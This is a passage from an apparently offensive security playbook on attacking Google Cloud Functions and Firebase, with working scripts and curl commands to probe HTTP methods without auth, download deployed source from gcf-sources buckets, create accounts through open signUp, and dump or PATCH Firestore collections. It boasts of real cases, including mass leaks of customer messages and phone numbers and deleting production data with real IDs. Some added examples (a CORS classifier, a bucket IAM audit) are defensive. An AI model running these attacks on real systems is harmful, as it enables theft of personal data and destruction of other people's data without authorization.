&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="93-testing-http-methods-get-post-put-delete" &gt;
&lt;div&gt;
&lt;a href="#93-testing-http-methods-get-post-put-delete"&gt;
##
&lt;/a&gt;
9.3 Testing HTTP Methods (GET, POST, PUT, DELETE)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;methods &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GET&amp;#34;&lt;/span&gt;: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;lambda&lt;/span&gt; u: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(u, json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;}),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;PUT&amp;#34;&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;lambda&lt;/span&gt; u: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;put(u, json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;}),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DELETE&amp;#34;&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;lambda&lt;/span&gt; u: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;delete(u),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; method_name, method_func &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; methods&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; method_func(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;not&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;401&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;403&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;404&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;405&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;method_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (ACCEPTED!)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;method_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: 6 Cloud Functions of the fitness tech company ecosystem with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;GET&lt;/strong&gt; without auth → dump of 15,800+ posts, 389+ users, real student data&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DELETE&lt;/strong&gt; without auth → confirmed destruction of production data (tested with real IDs)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reflected CORS&lt;/strong&gt; on ALL 6 functions → drive-by attack possible&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;705 PDF tokens&lt;/strong&gt; leaked from one of the functions&lt;/li&gt;
&lt;/ul&gt;
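&lt;p&gt;&lt;strong&gt;Added example&lt;/strong&gt; (not code from the original playbook): the "reflected CORS" item above is what turns an open function into a drive-by. The helper below classifies a function's CORS headers from the point of view of an attacker's page and decides whether a victim's browser could be made to read the data, distinguishing the case of an unauthenticated function (wildcard or reflection is enough) from a cookie-authenticated one (only a reflected origin together with &lt;code&gt;Access-Control-Allow-Credentials: true&lt;/code&gt; works). The header sets are constructed samples, &lt;code&gt;https://attacker.example&lt;/code&gt; is a placeholder origin, and &lt;code&gt;probe_cors&lt;/code&gt; is the only part that touches the network.&lt;/p&gt;

```python
import urllib.error
import urllib.request

# Constructed response header sets (sample data, not captured from any target).
SAMPLE_HEADERS = {
    "reflected-creds": {"Access-Control-Allow-Origin": "https://attacker.example",
                        "Access-Control-Allow-Credentials": "true", "Vary": "Origin"},
    "reflected-anon": {"Access-Control-Allow-Origin": "https://attacker.example"},
    "wildcard": {"Access-Control-Allow-Origin": "*"},
    "allowlist": {"Access-Control-Allow-Origin": "https://app.example.com"},
    "none": {"Content-Type": "application/json"},
}


def classify_cors(sent_origin, headers):
    """What a page on sent_origin may read from this response, judged from the
    headers the server returned to a request carrying 'Origin: sent_origin'."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").strip().lower() == "true"
    if acao is None:
        return "no-cors"                   # cross-origin read blocked by the browser
    if acao == "*":
        return "wildcard"                  # anonymous reads only: browsers refuse '*' with credentials
    if acao == "null":
        return "null-origin"               # reachable from sandboxed iframes / data: URLs
    if acao == sent_origin:
        return "reflected-with-credentials" if creds else "reflected"
    return "fixed-allowlist"


def drive_by_possible(verdict, auth_required):
    """True if a victim's browser can be made to fetch the data and hand it to the attacker.
    An open function leaks under wildcard or reflection; a cookie-authenticated one
    only when the origin is reflected together with Allow-Credentials."""
    if not auth_required:
        return verdict in ("wildcard", "reflected", "reflected-with-credentials", "null-origin")
    return verdict == "reflected-with-credentials"


def probe_cors(url, origin="https://attacker.example", timeout=10):
    """Live check: send a foreign Origin and classify whatever comes back,
    error responses included (their CORS headers count just the same)."""
    req = urllib.request.Request(url, headers={"Origin": origin})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_cors(origin, dict(resp.headers.items()))
    except urllib.error.HTTPError as e:
        return classify_cors(origin, dict(e.headers.items()))


def triage(sample_headers, auth_required=False):
    """Classify every header set and flag the drive-by cases: name -> (verdict, drive_by)."""
    origin = "https://attacker.example"
    result = {}
    for name, hdrs in sample_headers.items():
        verdict = classify_cors(origin, hdrs)
        result[name] = (verdict, drive_by_possible(verdict, auth_required))
    return result


if __name__ == "__main__":
    for name, (verdict, drive_by) in triage(SAMPLE_HEADERS).items():
        print(f"{name:16} {verdict:28} drive-by={'YES' if drive_by else 'no'}")
```

Run &lt;code&gt;probe_cors&lt;/code&gt; once per function with a GET and once with the same &lt;code&gt;Origin&lt;/code&gt; on a POST; backends that reflect only on preflighted methods are easy to miss otherwise.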
&lt;h3 id="94-source-code-buckets-gcp" &gt;
&lt;div&gt;
&lt;a href="#94-source-code-buckets-gcp"&gt;
##
&lt;/a&gt;
9.4 Source Code Buckets (GCP)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Cloud Functions stores each function's deployed source as a ZIP in a Google-managed GCS bucket inside the project. The bucket name uses the project number (not the project ID; the number also shows up in the default compute SA email &lt;code&gt;{PROJECT_NUMBER}-compute@developer.gserviceaccount.com&lt;/code&gt;) and the region:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;gcf-sources-{PROJECT_NUMBER}-{REGION}
gcf-v2-sources-{PROJECT_NUMBER}-{REGION}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;If the SA key has read permission, the source code can be downloaded:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; {Storage} &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; require(&lt;span style="color:#a6d189"&gt;&amp;#39;@google-cloud/storage&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; storage &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;new&lt;/span&gt; Storage({credentials&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; sa});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; bucket &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; storage.bucket(&lt;span style="color:#a6d189"&gt;&amp;#39;gcf-sources-706681009423-us-central1&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; [files] &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; bucket.getFiles();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; (&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; f &lt;span style="color:#ca9ee6"&gt;of&lt;/span&gt; files.filter(f =&amp;gt; f.name.endsWith(&lt;span style="color:#a6d189"&gt;&amp;#39;.zip&amp;#39;&lt;/span&gt;))) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; f.download({destination&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;/tmp/&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; f.name.replace(&lt;span style="color:#81c8be"&gt;/\//g&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;_&amp;#39;&lt;/span&gt;)});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
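&lt;p&gt;From the defender&amp;rsquo;s side, the question those bucket names raise is who is allowed to list or read them. The Python below is an added example, not the playbook&amp;rsquo;s code: it recognises the &lt;code&gt;gcf-sources&lt;/code&gt; / &lt;code&gt;gcf-v2-sources&lt;/code&gt; naming, extracts project number and region, and flags IAM bindings that expose the source archives to anyone other than the expected build service account. The bucket list, the policies and the build SA address are constructed sample data in the shape of a GCS IAM policy (&lt;code&gt;bindings&lt;/code&gt; with &lt;code&gt;role&lt;/code&gt; and &lt;code&gt;members&lt;/code&gt;); a real audit would feed it the output of &lt;code&gt;gsutil iam get&lt;/code&gt; for each bucket.&lt;/p&gt;

```python
import re

# Naming pattern of the source buckets described above (gen 1 and gen 2 functions):
# gcf-sources-{PROJECT_NUMBER}-{REGION} and gcf-v2-sources-{PROJECT_NUMBER}-{REGION}
SOURCE_BUCKET_RE = re.compile(r"^gcf-(v2-)?sources-(\d+)-([a-z0-9-]+)$")

# Principals that make a bucket readable by the whole internet / any Google account.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Roles that allow listing or reading objects in a bucket (non-exhaustive, assumption of this example).
LIST_OR_READ_ROLES = {
    "roles/storage.objectViewer", "roles/storage.objectAdmin", "roles/storage.admin",
    "roles/storage.legacyBucketReader", "roles/storage.legacyObjectReader",
    "roles/storage.legacyBucketOwner", "roles/storage.legacyBucketWriter",
    "roles/owner", "roles/editor", "roles/viewer",
}


def parse_source_bucket(name):
    """Return (project_number, generation, region) for a gcf source bucket, else None."""
    m = SOURCE_BUCKET_RE.match(name)
    if m is None:
        return None
    generation = "gen2" if m.group(1) else "gen1"
    return (m.group(2), generation, m.group(3))


def audit_bucket(policy, build_sa):
    """Flag bindings that let anyone other than the expected build SA list or read sources.
    policy is a GCS IAM policy dict: {"bindings": [{"role": ..., "members": [...]}]}.
    Returns a list of (severity, role, member)."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        if role not in LIST_OR_READ_ROLES:
            continue
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                findings.append(("CRITICAL", role, member))   # anyone on the internet
            elif member == "serviceAccount:" + build_sa:
                continue                                       # the expected deployer
            elif member.startswith("serviceAccount:"):
                findings.append(("HIGH", role, member))        # another SA: one leaked key reads the code
            else:
                findings.append(("MEDIUM", role, member))      # users, groups, domains: review the need
    return findings


def audit_project(buckets, build_sa):
    """buckets: {bucket_name: iam_policy}. Audits only the gcf source buckets."""
    report = {}
    for name, policy in buckets.items():
        if parse_source_bucket(name) is not None:
            report[name] = audit_bucket(policy, build_sa)
    return report


# Constructed sample: one gen1 and one gen2 source bucket plus an unrelated bucket.
SAMPLE_BUILD_SA = "123456789012@cloudbuild.gserviceaccount.com"
SAMPLE_BUCKETS = {
    "gcf-sources-123456789012-us-central1": {"bindings": [
        {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
        {"role": "roles/storage.objectAdmin", "members": ["serviceAccount:" + SAMPLE_BUILD_SA]},
    ]},
    "gcf-v2-sources-123456789012-europe-west1": {"bindings": [
        {"role": "roles/storage.objectViewer",
         "members": ["serviceAccount:legacy-app@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/storage.legacyBucketReader", "members": ["group:developers@example.com"]},
    ]},
    "website-assets-prod": {"bindings": [
        {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
    ]},
}

if __name__ == "__main__":
    for bucket, findings in audit_project(SAMPLE_BUCKETS, SAMPLE_BUILD_SA).items():
        print(bucket, parse_source_bucket(bucket))
        for severity, role, member in findings:
            print("  ", severity, role, member)
```

&lt;p&gt;The unrelated public bucket is deliberately ignored: the point of the check is that a source bucket readable by a second service account is one leaked key away from a full code dump, which is exactly the step the snippet above performs.&lt;/p&gt;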
&lt;h2 id="10-firebase-firestore--gcp-exploitation" &gt;
&lt;div&gt;
&lt;a href="#10-firebase-firestore--gcp-exploitation"&gt;
#
&lt;/a&gt;
10. FIREBASE, FIRESTORE &amp;amp; GCP EXPLOITATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="101-firebase-api-key--what-it-allows" &gt;
&lt;div&gt;
&lt;a href="#101-firebase-api-key--what-it-allows"&gt;
##
&lt;/a&gt;
10.1 Firebase API Key → What It Allows
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;The Firebase API Key (found in JS bundles and mobile apps) is NOT a secret, but it still allows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Firebase Auth&lt;/strong&gt;: create accounts (signUp), login (signIn)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Firestore&lt;/strong&gt;: if security rules allow public read/write&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Storage&lt;/strong&gt;: if rules allow public access&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Realtime Database&lt;/strong&gt;: if rules allow it&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Typical Firebase Config found in JS bundles:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; firebaseConfig &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apiKey&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AIzaSyC...&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; authDomain&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;project.firebaseapp.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; projectId&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;project-id&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; storageBucket&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;project-id.appspot.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; messagingSenderId&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;123456789&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appId&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;1:123456789:web:abcdef...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;};
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="102-open-signup--create-account-without-invite" &gt;
&lt;div&gt;
&lt;a href="#102-open-signup--create-account-without-invite"&gt;
##
&lt;/a&gt;
10.2 Open SignUp — Create Account Without Invite
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;email&amp;#34;:&amp;#34;attacker@domain.com&amp;#34;,&amp;#34;password&amp;#34;:&amp;#34;Senha123!&amp;#34;,&amp;#34;returnSecureToken&amp;#34;:true}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Response includes:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - idToken (Firebase JWT to use with APIs)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - localId (user UID)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - refreshToken&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Delivery platform — open signUp in Firebase project. Creating an account gave read access to 204K WhatsApp conversations, 173K customer phone numbers, and public storage with 1K+ MP3 audio files.&lt;/p&gt;
&lt;h3 id="103-firestore--test-public-access" &gt;
&lt;div&gt;
&lt;a href="#103-firestore--test-public-access"&gt;
##
&lt;/a&gt;
10.3 Firestore — Test Public Access
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List collections (requires SDK, not direct REST)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# But via REST API:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Try to list documents from common collections&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/users?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/stores?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/conversations?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If security rules are misconfigured → FULL DUMP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test WRITE (PATCH)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PATCH &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/stores/{ID}?updateMask.fieldPaths=fieldName&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;fields&amp;#34;:{&amp;#34;fieldName&amp;#34;:{&amp;#34;stringValue&amp;#34;:&amp;#34;test&amp;#34;}}}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Delivery platform — 3 Firebase projects with public Firestore:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{project}-app&lt;/code&gt;: 4,000 stores (CNPJ, GPS, phone, menu) + PATCH write confirmed&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{project}-whatsapp-bot&lt;/code&gt;: 204K WhatsApp conversations, 173K customer phone numbers, order content and addresses&lt;/li&gt;
&lt;li&gt;Storage &lt;code&gt;{project}-whatsapp-bot-media&lt;/code&gt;: 1K+ public MP3 audio files&lt;/li&gt;
&lt;/ul&gt;
